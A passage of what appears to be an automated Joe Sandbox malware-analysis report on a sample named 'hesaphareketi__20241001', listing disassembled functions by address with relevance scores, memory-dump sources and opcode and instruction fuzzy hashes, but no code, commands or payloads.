                                        • Opcode Fuzzy Hash: c304515f05da038c5535e729a8fac970cc87caebe4d8b0525cdaecd9d5c1a9b2
                                        • Instruction Fuzzy Hash: B0217CB0E14209DBCB08CFAAE88059DFBF2FF89300F14C9AA94149B255E7709A01DF50
                                        Function 0154D006 Relevance: .1, Instructions: 62COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2147865492.000000000154D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0154D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_154d000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 47fe8ab560467fca09b7f923b8fb66656637e296cb3c683062ca4ca7506c665c
                                        • Instruction ID: 4cd675f232322b3617922ae720d7652de5121e5352474647023de0642ea363f9
                                        • Opcode Fuzzy Hash: 47fe8ab560467fca09b7f923b8fb66656637e296cb3c683062ca4ca7506c665c
                                        • Instruction Fuzzy Hash: F12192755093808FDB13CF64D994715BF71FB46214F28C5DAD8498F2A7C33A980ACB62
                                        Function 0757ED81 Relevance: .1, Instructions: 61COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2a6f48bdfa904ea329fd6ea5e957f85ae36afa2d8c9a2d2ed5deb2afab268e97
                                        • Instruction ID: 0f7585ea8e4d52ec0b32d793f1c9cfb4db11428ed4831f83387b5d479de67236
                                        • Opcode Fuzzy Hash: 2a6f48bdfa904ea329fd6ea5e957f85ae36afa2d8c9a2d2ed5deb2afab268e97
                                        • Instruction Fuzzy Hash: 2F21E8B4A29118CFDB10CF54E585DECBBBABB4A300F50E995E80AA7255C731E942CF64
                                        Function 0757E6E8 Relevance: .1, Instructions: 59COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e936035546ab32978ca4be99c1316481555c4c2d7e632f4a8b31a7c39a36080a
                                        • Instruction ID: c6cc15b90a78a5d4b90dfee2f9a26e9230f4825e7ba1d12eedf87bda252add69
                                        • Opcode Fuzzy Hash: e936035546ab32978ca4be99c1316481555c4c2d7e632f4a8b31a7c39a36080a
                                        • Instruction Fuzzy Hash: D921EAB8D14249CFCB44CF99D5829EEBBF9BB49300F60A495D809AB711D730AE40CF91
                                        Function 07572384 Relevance: .1, Instructions: 59COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 41d4eecd9b9b4b2ce6f89875ac36504e8805029798379d5b08817637bc6a1d67
                                        • Instruction ID: c10c76033bbb735de14f609efc01b3cef939ffa2c87ef1cacc93a3b676f737fc
                                        • Opcode Fuzzy Hash: 41d4eecd9b9b4b2ce6f89875ac36504e8805029798379d5b08817637bc6a1d67
                                        • Instruction Fuzzy Hash: A9113DB1900219DFDB14DF6AD8446AEBBF1FF88320F14C62AE529DB2A0D7709944CB90
                                        Function 0757F698 Relevance: .1, Instructions: 58COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dfaa103589fd2e4b8a8dead4351ce8ffda150f28241c78dd0e307854574b4dab
                                        • Instruction ID: 4e0c5e6557fa4e740f2ffd18ea6969903c51da605321053e8f928adcda526964
                                        • Opcode Fuzzy Hash: dfaa103589fd2e4b8a8dead4351ce8ffda150f28241c78dd0e307854574b4dab
                                        • Instruction Fuzzy Hash: 7E11DAB0D18218DBDB08CFAAD8445EDBBFABF8E301F10D466E819A7291DB305506CF50
                                        Function 07571E10 Relevance: .1, Instructions: 58COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 56d48d696bfa4d14f4405354fbebbc9794e1c9ffa34e675c428c484cb89c1e93
                                        • Instruction ID: a6d09998e04a059e5a1c972d87d0aafa26e926c5fa8fc413ec2424f36269c108
                                        • Opcode Fuzzy Hash: 56d48d696bfa4d14f4405354fbebbc9794e1c9ffa34e675c428c484cb89c1e93
                                        • Instruction Fuzzy Hash: EE11C2B5A00A1A8BCB15DEA998445BFB7F6FFC82A0B154529D859D7340EF308D068791
                                        Function 07577018 Relevance: .1, Instructions: 57COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aafd9eac5fb19235405765aa9c3a96ea2cd36ece5b17dd6e1b7d59789e40fa98
                                        • Instruction ID: 351eab98db8fdb26fd4bf6f33174e628ed019a1362989fb6db4dd610c84f2203
                                        • Opcode Fuzzy Hash: aafd9eac5fb19235405765aa9c3a96ea2cd36ece5b17dd6e1b7d59789e40fa98
                                        • Instruction Fuzzy Hash: 751129B0E14209EBCB08CFAAE94059DFBF6FF89301F14D9AA941597214EB709A41DF50
                                        Function 075746A8 Relevance: .1, Instructions: 56COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aeb2fc0ef952b856746c9c80be531467a86bb9581a8ed851889c76815f46b2b7
                                        • Instruction ID: 88cd3a58d47bc3c4f79fffb5c2925db7442d2dde6c4601fe58ba0524a6bc5d77
                                        • Opcode Fuzzy Hash: aeb2fc0ef952b856746c9c80be531467a86bb9581a8ed851889c76815f46b2b7
                                        • Instruction Fuzzy Hash: 772114B58003499FCB10CF9AD884ADEBBF4FB48310F10841AE918A7210D379A944CFA5
                                        Function 075770F0 Relevance: .1, Instructions: 56COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b889993ad417cff5ef9b8bd6da05c1d7e7b20aff7d7bf3312803c74733be551b
                                        • Instruction ID: 26c07c8f362be92ed5e93a5126be80617ec4c91b67affef5b19f69c94a937794
                                        • Opcode Fuzzy Hash: b889993ad417cff5ef9b8bd6da05c1d7e7b20aff7d7bf3312803c74733be551b
                                        • Instruction Fuzzy Hash: 5B110AB4E04209EFCB44DFA9D585A9DFBF6FF8C200F14D9A5941897364DB309A00DB40
                                        Function 0153D3D3 Relevance: .1, Instructions: 56COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2147745248.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_153d000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                        • Instruction ID: 3d9cde12c686423184e008edff3eca458b30a38975032649d7e3169ac874ca17
                                        • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                        • Instruction Fuzzy Hash: 0C11CD72404240CFDB02CF54D5C4B5ABF71FB84224F24C6A9D9490B256C33AE45ACBA2
                                        Function 0153D4BF Relevance: .1, Instructions: 56COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2147745248.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_153d000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                        • Instruction ID: 7cb5e8e7bb751be5de9faa39a33a785070d04c92c205f5be198104c7748748c0
                                        • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                        • Instruction Fuzzy Hash: EB11DF72504280CFCB02CF54D5C4B1ABF71FB88314F24C6A9D9490F256C33AD45ACBA2
                                        Function 0757E792 Relevance: .1, Instructions: 53COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 65d0cf0c153beb4d0fb05ba67142e02ad0dd71ffb7d9db8e02298949c7ce3684
                                        • Instruction ID: 2c43a9706b2d29f493dac61b87596d9a7c0cb51ffe0a29b20baaf393133f3677
                                        • Opcode Fuzzy Hash: 65d0cf0c153beb4d0fb05ba67142e02ad0dd71ffb7d9db8e02298949c7ce3684
                                        • Instruction Fuzzy Hash: CC11DAB4D19249DFCB04DFA9D5419EDBBF9BF49310F1199E6D408AB211D7309A45CB80
                                        Function 0757EC28 Relevance: .1, Instructions: 53COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 896d5da62d9c93fc4cb98f7231628931bb0ee474e31509fc128fb7432b05392c
                                        • Instruction ID: 05b1e9df7a2317a8d44c8d461ad69d9a7349d4837a526626048f98a71349e422
                                        • Opcode Fuzzy Hash: 896d5da62d9c93fc4cb98f7231628931bb0ee474e31509fc128fb7432b05392c
                                        • Instruction Fuzzy Hash: 1011F8B0D14619CBEB18CF67D8456EEFAFBBFC9300F04D47A9409A6254DB300A46DE90
                                        Function 0154D1CF Relevance: .1, Instructions: 53COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2147865492.000000000154D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0154D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_154d000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                        • Instruction ID: 9f95a5a80a87fac9c24fc8605f17cd60585e91885127be41bffd008a851bedb0
                                        • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                        • Instruction Fuzzy Hash: F311BB75508280DFDB02CF54C5C4B19BFB1FB84228F24C6A9D8494F296C33AD40ACB62
                                        Function 0757E7A0 Relevance: .0, Instructions: 48COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fe994aa38f52933bb4e30bd884b32fe1e835428d28dd30184ea5174293e7f7a2
                                        • Instruction ID: 269b3947365c78955365b8736a78fd91c71019040ad7b4b012af9bf8fe83d5df
                                        • Opcode Fuzzy Hash: fe994aa38f52933bb4e30bd884b32fe1e835428d28dd30184ea5174293e7f7a2
                                        • Instruction Fuzzy Hash: 5711A5B4E18249DFCB08DFA9D5819EDBBF9BB49310F1099E59418AB315D730AA41CB80
                                        Function 07570448 Relevance: .0, Instructions: 47COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d53a1ef4c7126a15a464abce30208b8c547e9cae0202019f0a18d1ae3bbf5f5b
                                        • Instruction ID: a3a25061afd98ee8331d75a4b5baf6e10dda836ec46d644db7017fe0adf8985d
                                        • Opcode Fuzzy Hash: d53a1ef4c7126a15a464abce30208b8c547e9cae0202019f0a18d1ae3bbf5f5b
                                        • Instruction Fuzzy Hash: 2301B1303503225BE714AB6CD4147AA76EAAFC4718F10C56DD5898F3D2CEFAA84647E1
                                        Function 0757247A Relevance: .0, Instructions: 46COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7a2f71a19295a7e586532fa178e5635d7fbc68bd39ff7e4f3016277f92734d0b
                                        • Instruction ID: 9aaae49be1cdc96add4cfe9ab566015af080495e685128744b40e045bd6624f8
                                        • Opcode Fuzzy Hash: 7a2f71a19295a7e586532fa178e5635d7fbc68bd39ff7e4f3016277f92734d0b
                                        • Instruction Fuzzy Hash: F3016D76B005149FC7049B6AE884E6AB7EAFFD8621B51807AF509DB360DE31DC01C694
                                        Function 0757ED58 Relevance: .0, Instructions: 45COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ac8dd7ec46daa050ac770345a4b20c8c9feeca20eebd67934f88445c66b1e263
                                        • Instruction ID: e14e789b5515c77aaf8965ffc74cfc01df3a0bd7828d9b5d2b8d7db8748b22e2
                                        • Opcode Fuzzy Hash: ac8dd7ec46daa050ac770345a4b20c8c9feeca20eebd67934f88445c66b1e263
                                        • Instruction Fuzzy Hash: 4511C2B4A14118CFCB14CF54E9859ECBBBABB4E311F909595E80AA7351DB31AD82CF20
                                        Function 0153D745 Relevance: .0, Instructions: 45COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2147745248.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_153d000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 840185597b116e8da400c9faf22c1767a2162f4f057491eb57609a27d1d1d7fe
                                        • Instruction ID: b8eec1a212ff4aac658b71297344b20089f7e7ff0016a70207e5f84bc6618ccf
                                        • Opcode Fuzzy Hash: 840185597b116e8da400c9faf22c1767a2162f4f057491eb57609a27d1d1d7fe
                                        • Instruction Fuzzy Hash: EC01FC310043809AE7124A59CD84B66BFFCFF85360F54C969ED090F286C2399400CA71
                                        Function 0757B3C0 Relevance: .0, Instructions: 44COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4ed58f0fca8242b642c7e2b9f56a2bde03352b4c6e6cd0b6d2adbb2ee48c8522
                                        • Instruction ID: e1206ad4d4c608b5064ca922b0f669a08210753fd7e6a0548ee6aa6f49f1dd2e
                                        • Opcode Fuzzy Hash: 4ed58f0fca8242b642c7e2b9f56a2bde03352b4c6e6cd0b6d2adbb2ee48c8522
                                        • Instruction Fuzzy Hash: 5F0129B4E15209DFCB44CFA9E5456AEFBF6BB88200F10C5AA8409E3344EB309A41CB51
                                        Function 0757B458 Relevance: .0, Instructions: 43COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fef1c8f7cda752d9973f986463e7b519f623f63b9fb55582c9fea1d45976b96b
                                        • Instruction ID: 96f1cc45355f48dd2b3665e6dd2d10505e43729c58a7c344ea1f8bcdf03ec51c
                                        • Opcode Fuzzy Hash: fef1c8f7cda752d9973f986463e7b519f623f63b9fb55582c9fea1d45976b96b
                                        • Instruction Fuzzy Hash: 28017CF5E18209DFCB04CBA8E98169DBFB3FB45210F2485EAD81997380E7359A51DB41
                                        Function 0757ED45 Relevance: .0, Instructions: 43COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1e07b8f8c744f16684aa6d3db10e89005aaf4678daa451887522ded63f453840
                                        • Instruction ID: f3834d783d84ac9af94c9e71567797e2fab5f9aec5dfb4b4bf906c64ab18cfcd
                                        • Opcode Fuzzy Hash: 1e07b8f8c744f16684aa6d3db10e89005aaf4678daa451887522ded63f453840
                                        • Instruction Fuzzy Hash: 4D0112B4A19104CFCB10CF54E585DECB7BAFB0A301F50A496E40AA7251DB319942CF61
                                        Function 0757F2A2 Relevance: .0, Instructions: 41COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7cd628c3ccac5e89a61b068bd2e19b947cd8cbea23fa267f34c50695193ad2bb
                                        • Instruction ID: 7ef1aad8942cc8fe2c30dcf8a1c154c78ae76d90ea3a812e8552d470a8500296
                                        • Opcode Fuzzy Hash: 7cd628c3ccac5e89a61b068bd2e19b947cd8cbea23fa267f34c50695193ad2bb
                                        • Instruction Fuzzy Hash: F20152B0929154CFC710CF14E9859EC7BBEBF4A301F449896D40AA7396DB319846CF54
                                        Function 0757FB38 Relevance: .0, Instructions: 41COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3a59727095dc0b35beff1a97f48eef10f82341111cf5d2bab3370ef4e43177d4
                                        • Instruction ID: fa1778db04a55b22054c68f39419eb79b77dd065c7cfc8fdb33a7f48e5da1fba
                                        • Opcode Fuzzy Hash: 3a59727095dc0b35beff1a97f48eef10f82341111cf5d2bab3370ef4e43177d4
                                        • Instruction Fuzzy Hash: F801DA74A14108DFC704DFA9D698AADBBF5BB4D300F25D494A40D97351DB309E01EB40
                                        Function 0757FAC0 Relevance: .0, Instructions: 39COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7684de7368a6e1633447a6198ba1d03f7e895e3645f4923aa9947ffc40928215
                                        • Instruction ID: 43a6b47e6e579dd645a2aa8ce0f02a90bc4bb07de761985d93efb258ed0f0e57
                                        • Opcode Fuzzy Hash: 7684de7368a6e1633447a6198ba1d03f7e895e3645f4923aa9947ffc40928215
                                        • Instruction Fuzzy Hash: CAF03CB0A29108DFCB04CF55E5419F9BBFDFF4A300F10A5A594095B296DB309A46DB80
                                        Function 0757F102 Relevance: .0, Instructions: 38COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9c2156f849fe71e401ba63c401d69fbd15400696b002939e5d1e319dc6189890
                                        • Instruction ID: 3f462efd6bf1c51dd0a9dde4cc856bc8e3f8137d2d2d66456b6693b692d84583
                                        • Opcode Fuzzy Hash: 9c2156f849fe71e401ba63c401d69fbd15400696b002939e5d1e319dc6189890
                                        • Instruction Fuzzy Hash: 1D01ECB4A19104CFC714CF54E585DECB7BABB4E311F50A595E40AA7391CB31AD42CF20
                                        Function 0757EE5F Relevance: .0, Instructions: 38COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 927f94f2e64f25db316fb146932db9506dfd46f0536c4d196adc34690979fb73
                                        • Instruction ID: be1e21a6697624def45d745cbfa4d8e2c69f502264017c62c0c552ba7121b9db
                                        • Opcode Fuzzy Hash: 927f94f2e64f25db316fb146932db9506dfd46f0536c4d196adc34690979fb73
                                        • Instruction Fuzzy Hash: 8401ECB0A19104CFC714CF54E585DECB7BABB4E311F50A495E40AA7391DB31AD42CF20
                                        Function 0153D744 Relevance: .0, Instructions: 36COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2147745248.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_153d000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0ee9d580b35a958e7cae86d740681bccb3f76569c5d9b89a9a43da5cc1bd4d4d
                                        • Instruction ID: b2fe8005ab6b4b3a96f4b659daf39824133d9ab53a74df3d055661c8a917169e
                                        • Opcode Fuzzy Hash: 0ee9d580b35a958e7cae86d740681bccb3f76569c5d9b89a9a43da5cc1bd4d4d
                                        • Instruction Fuzzy Hash: 31F062714053849AE7118E1AC888B66FFA8FF95634F18C45AEE484F28BC3799844CAB1
                                        Function 07572420 Relevance: .0, Instructions: 34COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3c222a88d202d172ffa05f65ac515a8f5c942879ce6a23e530adb26f5137b7e1
                                        • Instruction ID: a539d647e6f922a95f755b97bd9feb693a3bc9504396ecdf415148ccbda84e39
                                        • Opcode Fuzzy Hash: 3c222a88d202d172ffa05f65ac515a8f5c942879ce6a23e530adb26f5137b7e1
                                        • Instruction Fuzzy Hash: 88F082B6B001145FD304CA99D884E6BA7E9FFCC6647254065E508E7350DA318C0187A0
                                        Function 07572390 Relevance: .0, Instructions: 34COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fec0b33cabe99fc2454d1487275a607f921c5b56c2f27f6395c41b3687b57c72
                                        • Instruction ID: 869d4a333765dd2a34d1de482ddc479f071d66e9f5bfd00da28d9d07aa170205
                                        • Opcode Fuzzy Hash: fec0b33cabe99fc2454d1487275a607f921c5b56c2f27f6395c41b3687b57c72
                                        • Instruction Fuzzy Hash: 0301BBB080421DDFEB14DF6AD4047EEBAF5FF49360F148625E424AA290D7744A84CFD1
                                        Function 07572430 Relevance: .0, Instructions: 32COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dc221724028c906f3e08e8f311ab3c5105cbbcb8a396b9cbebe7f5fb86a14354
                                        • Instruction ID: d950db8449e0897830524583501a570b68f4a87caacd94d31cf8a895d2f054cc
                                        • Opcode Fuzzy Hash: dc221724028c906f3e08e8f311ab3c5105cbbcb8a396b9cbebe7f5fb86a14354
                                        • Instruction Fuzzy Hash: 79E06D727001286F9304DAAEDC84C6BBBEDFBCC670361807AF508C7310DA319C01C6A0
                                        Function 07570540 Relevance: .0, Instructions: 31COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b4d8a3c8d80d4ca14c38407b8d9d855058a58cd3510ebe034a19a7367c9b0ed8
                                        • Instruction ID: e867c444c223dc22a85e6d1945bb129e434366c6f374ea1b2ae7629bc2d94c33
                                        • Opcode Fuzzy Hash: b4d8a3c8d80d4ca14c38407b8d9d855058a58cd3510ebe034a19a7367c9b0ed8
                                        • Instruction Fuzzy Hash: F6F0D4B16147558F9F28DF18E4829957BE5FB092587200DAAE46ACF302D7A6E9038B84
                                        Function 0757A468 Relevance: .0, Instructions: 31COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
